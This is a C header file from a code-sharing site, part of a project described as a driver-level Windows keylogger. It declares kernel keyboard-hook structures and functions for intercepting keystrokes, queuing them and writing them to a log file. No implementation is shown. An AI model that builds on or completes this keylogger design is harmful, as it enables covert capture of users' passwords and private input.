kbhook.h
来自「实现驱动程序级别的键盘记录功能的源代码!!使用vc++6.0实现!!程序可以记录」· C头文件 代码 · 共 56 行
H
56 行
#include "ntddk.h"
#include "kbdmou.h"
#include "ntddkbd.h"
#include "ntdd8042.h"
typedef struct _KEY_STATE
{
BOOLEAN kSHIFT;
BOOLEAN kCAPSLOCK;
BOOLEAN kCTRL;
BOOLEAN kALT;
}KEY_STATE;
typedef struct _DEVICE_EXTENSION
{
PDEVICE_OBJECT pKeyboardDevice;
//PDEVICE_OBJECT pControlDevice;
PETHREAD pThreadObject;
BOOLEAN bThreadTerminate;
HANDLE hLogFile;
KEY_STATE kState;
KSEMAPHORE semQueue;
KSPIN_LOCK lockQueue;
LIST_ENTRY QueueListHead;
}DEVICE_EXTENSION,*PDEVICE_EXTENSION;
/*
typedef struct KEYBOARD_INPUT_DATA{
USHORT UnitId;
USHORT MakeCode;
USHORT Flags;
USHORT Reserved;
ULONG ExtraInformation;
}KEYBOARD_INPUT_DATA,*PKEYBOARD_INPUT_DATA;
*/ //在ntddkbd.h中定义
typedef struct KEY_DATA{
char KeyData;
char KeyFlags;
LIST_ENTRY ListEntry;
}KEY_DATA;
//////////////////////////////////////////////////////////////////////////////////////////
//PDEVICE_EXTENSION pKeyboardDeviceExtension;
/////////////////////////////////////////////////////////////////////////////////////////
NTSTATUS HookKeyboard(IN PDRIVER_OBJECT theDriverObject);
NTSTATUS InitThreadKeyLogger(IN PDRIVER_OBJECT theDriverObject);
NTSTATUS DispatchPassDown(IN PDEVICE_OBJECT theDeviceObject,IN PIRP pIrp);
NTSTATUS DispatchRead(IN PDEVICE_OBJECT theDeviceObject,IN PIRP pIrp);
VOID OnUnload( IN PDRIVER_OBJECT DriverObject );
VOID ThreadKeyLogger(IN PVOID pContext);
NTSTATUS OnReadCompletion(IN PDEVICE_OBJECT theDeviceObject,IN PIRP pIrp,IN PVOID Context);
//VOID ConvertScanCodeToKeyCode(PDEVICE_EXTENSION pDevExt, KEY_DATA* kData, char* keys);
//////////////////////////////////////////////////////////////////////////////////////////⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?